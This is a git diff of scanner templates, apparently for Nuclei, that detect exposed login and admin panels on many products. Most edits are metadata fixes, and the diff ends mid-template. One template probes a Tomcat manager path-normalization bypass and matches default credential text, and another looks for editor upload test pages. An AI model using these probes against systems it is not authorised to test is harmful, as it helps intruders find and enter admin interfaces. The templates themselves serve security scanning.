diff --git a/exposed-panels/setup-page-exposure.yaml b/exposed-panels/setup-page-exposure.yaml
index 8263823b24..f59a847c59 100644
--- a/exposed-panels/setup-page-exposure.yaml
+++ b/exposed-panels/setup-page-exposure.yaml
@@ -2,9 +2,10 @@ id: setup-page-exposure
info:
name: Zenphoto Setup Page Exposure
- author: pd-team
+ author: pdteam
severity: medium
description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/sgp-login-panel.yaml b/exposed-panels/sgp-login-panel.yaml
new file mode 100644
index 0000000000..15ee1ecf69
--- /dev/null
+++ b/exposed-panels/sgp-login-panel.yaml
@@ -0,0 +1,30 @@
+id: sgp-login-panel
+
+info:
+ name: SGP Panel
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22SGP%22
+ tags: panel,sgp
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/accounts/login?next=/admin/'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'SGP '
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - ">Ver\\. ([0-9.A-Z]+)"
diff --git a/exposed-panels/sharecenter-login.yaml b/exposed-panels/sharecenter-login.yaml
new file mode 100644
index 0000000000..1c3df0b1ad
--- /dev/null
+++ b/exposed-panels/sharecenter-login.yaml
@@ -0,0 +1,19 @@
+id: sharecenter-login
+
+info:
+ name: ShareCenter Login Page
+ author: dhiyaneshDk
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6892
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "ShareCenter"
+ - "Please Select Your Account"
+ condition: and
diff --git a/exposed-panels/sitecore-login-panel.yaml b/exposed-panels/sitecore-login-panel.yaml
new file mode 100644
index 0000000000..64258de71b
--- /dev/null
+++ b/exposed-panels/sitecore-login-panel.yaml
@@ -0,0 +1,23 @@
+id: sitecore-login-panel
+
+info:
+ name: Sitecore Login Panel
+ author: b4uh0lz
+ severity: info
+ tags: panel,sitecore
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/sitecore/admin/login.aspx"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Sitecore Login"
+ part: body
\ No newline at end of file
diff --git a/exposed-panels/sitefinity-login.yaml b/exposed-panels/sitefinity-login.yaml
new file mode 100644
index 0000000000..32154bf13e
--- /dev/null
+++ b/exposed-panels/sitefinity-login.yaml
@@ -0,0 +1,22 @@
+id: sitefinity-login
+
+info:
+ name: Sitefinity Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6722
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/Sitefinity/Authenticate/SWT'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Telerik.Sitefinity.Web.UI.UserPreferences'
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/siteomat-login.yaml b/exposed-panels/siteomat-login.yaml
new file mode 100644
index 0000000000..cc3de6c3f1
--- /dev/null
+++ b/exposed-panels/siteomat-login.yaml
@@ -0,0 +1,22 @@
+id: siteomat-loader
+
+info:
+ name: Orpak SiteOmat login portals
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6624
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.htm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'SiteOmat Login '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/solarwinds-orion.yaml b/exposed-panels/solarwinds-orion.yaml
index d7b1c86ab7..22d351173f 100644
--- a/exposed-panels/solarwinds-orion.yaml
+++ b/exposed-panels/solarwinds-orion.yaml
@@ -4,6 +4,7 @@ info:
name: SolarWinds Orion Panel
author: puzzlepeaches
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/solarwinds-servuftp-detect.yaml b/exposed-panels/solarwinds-servuftp-detect.yaml
new file mode 100644
index 0000000000..f443f549a0
--- /dev/null
+++ b/exposed-panels/solarwinds-servuftp-detect.yaml
@@ -0,0 +1,29 @@
+id: solarwinds-servuftp-detect
+
+info:
+ name: SolarWinds Serv-U FileServer
+ author: johnk3r
+ severity: info
+ tags: solarwinds,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ part: header
+ regex:
+ - "Serv-U"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: kval
+ part: header
+ kval:
+ - Server
diff --git a/exposed-panels/solr-exposure.yaml b/exposed-panels/solr-exposure.yaml
index eeb98e2544..fd452ca000 100644
--- a/exposed-panels/solr-exposure.yaml
+++ b/exposed-panels/solr-exposure.yaml
@@ -2,8 +2,9 @@ id: solr-exposure
info:
name: Apache Solr Exposure
- author: pd-team
+ author: pdteam
severity: medium
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/somfy-login.yaml b/exposed-panels/somfy-login.yaml
new file mode 100644
index 0000000000..61c85d3773
--- /dev/null
+++ b/exposed-panels/somfy-login.yaml
@@ -0,0 +1,22 @@
+id: somfy-login
+
+info:
+ name: Somfy Login Page
+ author: DhiyaneshDK
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/m_login.htm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - Home motion by Somfy
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/sonarqube-login.yaml b/exposed-panels/sonarqube-login.yaml
index 320e3089ce..fed56ea5d9 100644
--- a/exposed-panels/sonarqube-login.yaml
+++ b/exposed-panels/sonarqube-login.yaml
@@ -4,6 +4,7 @@ info:
name: SonarQube panel detect
author: dhiyaneshDk
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/sonicwall-management-panel.yaml b/exposed-panels/sonicwall-management-panel.yaml
index 6bd7500303..edcb9d4636 100644
--- a/exposed-panels/sonicwall-management-panel.yaml
+++ b/exposed-panels/sonicwall-management-panel.yaml
@@ -4,6 +4,7 @@ info:
name: SonicWall Management Panel
author: PR3R00T
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/sonicwall-sslvpn-panel.yaml b/exposed-panels/sonicwall-sslvpn-panel.yaml
index b71f83cfd3..cd580effba 100644
--- a/exposed-panels/sonicwall-sslvpn-panel.yaml
+++ b/exposed-panels/sonicwall-sslvpn-panel.yaml
@@ -4,6 +4,7 @@ info:
name: SonicWall Virtual Office SSLVPN Panel
author: PR3R00T
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/sophos-fw-version-detect.yaml b/exposed-panels/sophos-fw-version-detect.yaml
index 96dce2b6b6..4805643d16 100644
--- a/exposed-panels/sophos-fw-version-detect.yaml
+++ b/exposed-panels/sophos-fw-version-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Sophos Firewall version detection
author: organiccrap
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/sphider-login.yaml b/exposed-panels/sphider-login.yaml
new file mode 100644
index 0000000000..31a5d753d0
--- /dev/null
+++ b/exposed-panels/sphider-login.yaml
@@ -0,0 +1,24 @@
+id: sphider-login
+
+info:
+ name: Sphider Admin Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6641
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/admin/spider.php'
+ - '{{BaseURL}}/sphider/admin/admin.php'
+ - '{{BaseURL}}/search/admin/admin.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Sphider Admin Login '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/splunk-login.yaml b/exposed-panels/splunk-login.yaml
new file mode 100644
index 0000000000..1cdc420015
--- /dev/null
+++ b/exposed-panels/splunk-login.yaml
@@ -0,0 +1,23 @@
+id: splunk-login
+
+info:
+ name: Splunk SOAR
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Splunk+SOAR%22
+ tags: panel,splunk
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login?next=/'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Splunk SOAR '
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/supervpn-panel.yaml b/exposed-panels/supervpn-panel.yaml
index 017194340c..ef939f6a7f 100644
--- a/exposed-panels/supervpn-panel.yaml
+++ b/exposed-panels/supervpn-panel.yaml
@@ -4,6 +4,7 @@ info:
name: SuperVPN panel detect
author: organiccrap
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/synnefo-admin-panel.yaml b/exposed-panels/synnefo-admin-panel.yaml
new file mode 100644
index 0000000000..9a79f3b8da
--- /dev/null
+++ b/exposed-panels/synnefo-admin-panel.yaml
@@ -0,0 +1,22 @@
+id: synnefo-admin-panel
+
+info:
+ name: Synnefo Admin Panel Exposure
+ author: impramodsargar
+ severity: info
+ tags: panel,synnefo
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/synnefoclient/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Synnefo Admin '
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/terramaster-login.yaml b/exposed-panels/terramaster-login.yaml
new file mode 100644
index 0000000000..a5f6a1017d
--- /dev/null
+++ b/exposed-panels/terramaster-login.yaml
@@ -0,0 +1,26 @@
+id: terramaster-login
+
+info:
+ name: TerraMaster Login Panel
+ author: gy741
+ severity: info
+ tags: panel,terramaster
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - "TOS Loading "
+ part: body
+
+ - type: word
+ words:
+ - "Server: TOS"
+ - "X-Powered-By: TerraMaster"
+ condition: or
+ part: header
diff --git a/exposed-panels/tikiwiki-cms.yaml b/exposed-panels/tikiwiki-cms.yaml
index 35ea7ceccc..b36fe00e20 100644
--- a/exposed-panels/tikiwiki-cms.yaml
+++ b/exposed-panels/tikiwiki-cms.yaml
@@ -4,6 +4,7 @@ info:
name: Tiki Wiki CMS Groupware
author: chron0x
severity: info
+ tags: panel,tikiwiki
requests:
- method: GET
diff --git a/exposed-panels/tomcat-manager-pathnormalization.yaml b/exposed-panels/tomcat-manager-pathnormalization.yaml
index 54dca1aa99..b0300beed9 100644
--- a/exposed-panels/tomcat-manager-pathnormalization.yaml
+++ b/exposed-panels/tomcat-manager-pathnormalization.yaml
@@ -1,19 +1,28 @@
id: tomcat-manager-pathnormalization
+
info:
name: Tomcat Manager Path Normalization
author: organiccrap
severity: info
- # https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
+ reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
+ tags: panel
+
requests:
- method: GET
path:
- '{{BaseURL}}/..;/manager/html'
- '{{BaseURL}}/..;/host-manager/html'
- headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+
+ matchers-condition: and
matchers:
- type: word
words:
- - username="tomcat" password="s3cret"
- - manager-gui
+ - 'username="tomcat" password="s3cret"'
+ - 'manager-gui'
condition: and
+
+ - type: status
+ status:
+ - 403
+ - 401
+ negative: true
diff --git a/exposed-panels/total-web.yaml b/exposed-panels/total-web.yaml
new file mode 100644
index 0000000000..ba8a8510dc
--- /dev/null
+++ b/exposed-panels/total-web.yaml
@@ -0,0 +1,22 @@
+id: total-web-login
+
+info:
+ name: Total Web Solution
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6811
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Total Web Solutions '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/traefik-dashboard.yaml b/exposed-panels/traefik-dashboard.yaml
index ac0b10ec90..4ec724074d 100644
--- a/exposed-panels/traefik-dashboard.yaml
+++ b/exposed-panels/traefik-dashboard.yaml
@@ -2,8 +2,9 @@ id: traefik-dashboard-detect
info:
name: Traefik Dashboard
- author: schniggie & StreetOfHackerR007
+ author: schniggie,StreetOfHackerR007
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/tuxedo-connected-controller.yaml b/exposed-panels/tuxedo-connected-controller.yaml
new file mode 100644
index 0000000000..b6d98be89e
--- /dev/null
+++ b/exposed-panels/tuxedo-connected-controller.yaml
@@ -0,0 +1,22 @@
+id: tuxedo-connected-controller
+
+info:
+ name: Tuxedo Connected Controller
+ author: dhiyaneshDk
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6486
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login.html"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Tuxedo Connected Controller '
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/unauthenticated-frp.yaml b/exposed-panels/unauthenticated-frp.yaml
new file mode 100644
index 0000000000..893f35e69b
--- /dev/null
+++ b/exposed-panels/unauthenticated-frp.yaml
@@ -0,0 +1,25 @@
+id: unauthenticated-frp
+
+info:
+ name: Unauthenticated FRP
+ author: pikpikcu
+ severity: info
+ tags: frp,unauth,panel
+ vendor: https://github.com/fatedier/frp/
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/static/"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "frps dashboard "
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/vigor-login.yaml b/exposed-panels/vigor-login.yaml
new file mode 100644
index 0000000000..d487f7344e
--- /dev/null
+++ b/exposed-panels/vigor-login.yaml
@@ -0,0 +1,22 @@
+id: vigor-login
+
+info:
+ name: Vigor Login Page
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6610
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/weblogin.htm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Vigor Login Page '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/virtual-ema-detect.yaml b/exposed-panels/virtual-ema-detect.yaml
index 736b50eb22..7d7e720916 100644
--- a/exposed-panels/virtual-ema-detect.yaml
+++ b/exposed-panels/virtual-ema-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Virtual EMS Panel Detection
author: iamthefrogy
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/vmware-horizon.yaml b/exposed-panels/vmware-horizon.yaml
new file mode 100644
index 0000000000..3c4c7f59a2
--- /dev/null
+++ b/exposed-panels/vmware-horizon.yaml
@@ -0,0 +1,22 @@
+id: vmware-horizon
+
+info:
+ name: VMware Horizon Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6496
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/portal/webclient/index.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'VMware Horizon '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/wago-plc-panel.yaml b/exposed-panels/wago-plc-panel.yaml
new file mode 100644
index 0000000000..7cce350fbf
--- /dev/null
+++ b/exposed-panels/wago-plc-panel.yaml
@@ -0,0 +1,25 @@
+id: wago-plc-panel
+
+info:
+ name: WAGO PLC Panel
+ author: github.com/its0x08
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/plc/webvisu.htm"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "CoDeSys WebVisualization "
+ - "webvisu.jar,minml.jar"
+ part: body
+ condition: or
+
+ - type: word
+ words:
+ - "WAGO_Webs"
+ part: header
\ No newline at end of file
diff --git a/exposed-panels/weatherlink.yaml b/exposed-panels/weatherlink.yaml
new file mode 100644
index 0000000000..3f9d994189
--- /dev/null
+++ b/exposed-panels/weatherlink.yaml
@@ -0,0 +1,22 @@
+id: weatherlink-configuration
+
+info:
+ name: WeatherLinkIP Configuration
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6007
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'WeatherLinkIP Configuration '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/weave-scope-dashboard-detect.yaml b/exposed-panels/weave-scope-dashboard-detect.yaml
index 0b1d93761a..8bed7aece0 100644
--- a/exposed-panels/weave-scope-dashboard-detect.yaml
+++ b/exposed-panels/weave-scope-dashboard-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Weave Scope Dashboard
author: e_schultze_
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/web-local-craft.yaml b/exposed-panels/web-local-craft.yaml
new file mode 100644
index 0000000000..72e99b91ce
--- /dev/null
+++ b/exposed-panels/web-local-craft.yaml
@@ -0,0 +1,22 @@
+id: weblocal-craft-login
+
+info:
+ name: Web local craft Terminal Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6800
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/home.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'WEB Local Craft Terminal'
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/webeditors.yaml b/exposed-panels/webeditors.yaml
index c146ab60f8..042d7f0949 100644
--- a/exposed-panels/webeditors.yaml
+++ b/exposed-panels/webeditors.yaml
@@ -2,13 +2,15 @@ id: webeditors
info:
name: Web Editors
- author: pwnmachine
+ author: princechaddha,bernardofsr
severity: info
+ tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/fckeditor/_samples/default.html"
+ - "{{BaseURL}}/fckeditor/editor/filemanager/connectors/uploadtest.html"
- "{{BaseURL}}/ckeditor/samples/"
- "{{BaseURL}}/editor/ckeditor/samples/"
- "{{BaseURL}}/ckeditor/samples/sample_posteddata.php"
@@ -16,12 +18,14 @@ requests:
- "{{BaseURL}}/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"
- "{{BaseURL}}/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php"
- "{{BaseURL}}/ueditor/php/getRemoteImage.php"
+
matchers:
- type: word
words:
- "FCKeditor"
- "CKEditor Samples "
- "http://ckeditor.com"
+ - "Custom Uploader URL:"
- "init_spell()"
- "'tip':'"
condition: or
diff --git a/exposed-panels/webmin-panel.yaml b/exposed-panels/webmin-panel.yaml
index 7787b28d95..c75733a336 100644
--- a/exposed-panels/webmin-panel.yaml
+++ b/exposed-panels/webmin-panel.yaml
@@ -4,6 +4,7 @@ info:
name: Webmin Admin Panel
author: PR3R00T
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/wildfly-panel.yaml b/exposed-panels/wildfly-panel.yaml
new file mode 100644
index 0000000000..78bc863684
--- /dev/null
+++ b/exposed-panels/wildfly-panel.yaml
@@ -0,0 +1,23 @@
+id: wildfly-panel
+
+info:
+ name: WildFly Instance Detection Template
+ author: righettod
+ severity: info
+ description: Try to detect the presence of a WildFly (ex-JBoss) instance via the login panel
+ tags: panel,jboss,wildfly
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Welcome to WildFly"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/wordpress-login.yaml b/exposed-panels/wordpress-login.yaml
new file mode 100644
index 0000000000..278c7a9113
--- /dev/null
+++ b/exposed-panels/wordpress-login.yaml
@@ -0,0 +1,20 @@
+id: wordpress-panel
+
+info:
+ name: WordPress Panel
+ author: github.com/its0x08
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-login.php"
+ matchers:
+ - type: word
+ words:
+ - "WordPress "
+ - "Log In "
+ - '/wp-login.php?action=lostpassword">Lost your password?'
+ - ' "
+ - '